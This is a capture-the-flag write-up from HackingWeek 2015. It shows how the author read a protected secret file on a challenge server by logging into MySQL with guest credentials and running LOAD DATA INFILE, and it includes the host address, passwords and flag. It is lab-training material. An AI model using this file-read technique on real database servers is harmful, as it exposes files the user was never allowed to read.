English [HackingWeek 2015] [Exploit4] Write Up

Description

Log on as guest (password: shu1eKoo) on machine 37.187.22.21.
You will find the hidden validation key in /home/exploit04/.secret.

$> ssh guest@37.187.22.21

Resolution

This chall is not quite difficult, just as the exploit03, a little trick to find, but it was still funny to find out the solution 🙂 As we can see, there are some files in the directory :

guest@ns314076:/home/exploit04/project$ ls -la
total 198332
dr-xr-xr-x 4 exploit04 exploit04 4096 May 12 12:48 .
dr-xr-xr-x 3 exploit04 exploit04 4096 Apr 30 17:59 ..
-r--r--r-- 1 exploit04 exploit04 598 Apr 30 17:22 Makefile
dr-xr-xr-x 13 exploit04 exploit04 4096 Apr 30 18:02 mysql-5.5.19-linux2.6-i686
-r--r--r-- 1 exploit04 exploit04 178764831 Apr 30 17:15 mysql-5.5.19-linux2.6-i686.tar.gz
-r--r--r-- 1 exploit04 exploit04 24296942 Apr 30 17:15 mysql-5.5.19.tar.gz
drwxr-xr-x 5 exploit04 exploit04 4096 May 19 16:33 mysql-db
-r--r--r-- 1 exploit04 exploit04 314 Apr 30 17:15 mysqld.cnf
-r--r--r-- 1 exploit04 exploit04 137 Apr 30 17:33 NOTES.txt

NOTES.txt gives us a guest account :


guest@ns314076:/home/exploit04/project$ cat NOTES.txt
Testing a MySQL server 5.5.19

Test user
 - login = guest
 - password = guest

$> mysql --host=localhost --user=guest --password=guest

We can suppose some ways here to give us access to the flag file :

  • Any public exploit in the 5.5.19 version of mysql
  • Some weaknesses in the configuration file
  • Bad access rights with the mysql guest user

In order to check every piece of information, I began by connecting onto the mysql service, with the given credentials

mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
+--------------------+
4 rows in set (0.00 sec)

Nothing weird here. The main question here is how to get the content of a file with mysql ? Mysql can easily takes a file as an input in order to put the content into a table with the LOAD DATA INFILE (https://dev.mysql.com/doc/refman/5.1/en/load-data.html) statement. So why not try if the guest account has the right to do this 😉

mysql> create database test;
Query OK, 1 row affected (0.02 sec)
mysql> create table test (data VARCHAR(50));
Query OK, 0 rows affected (0.09 sec)
mysql> load data infile '/home/exploit04/.secret' INTO table test;
Query OK, 1 row affected (0.08 sec)
Records: 1 Deleted: 0 Skipped: 0 Warnings: 0

mysql> select * from test;
+------------+
| data |
+------------+
| xaeVu9oot1 |
+------------+
1 row in set (0.00 sec)

And… P-P-P-PWNED ! The flag is xaeVu9oot1

Enjoy

The lsd

Leave a Reply

Your email address will not be published.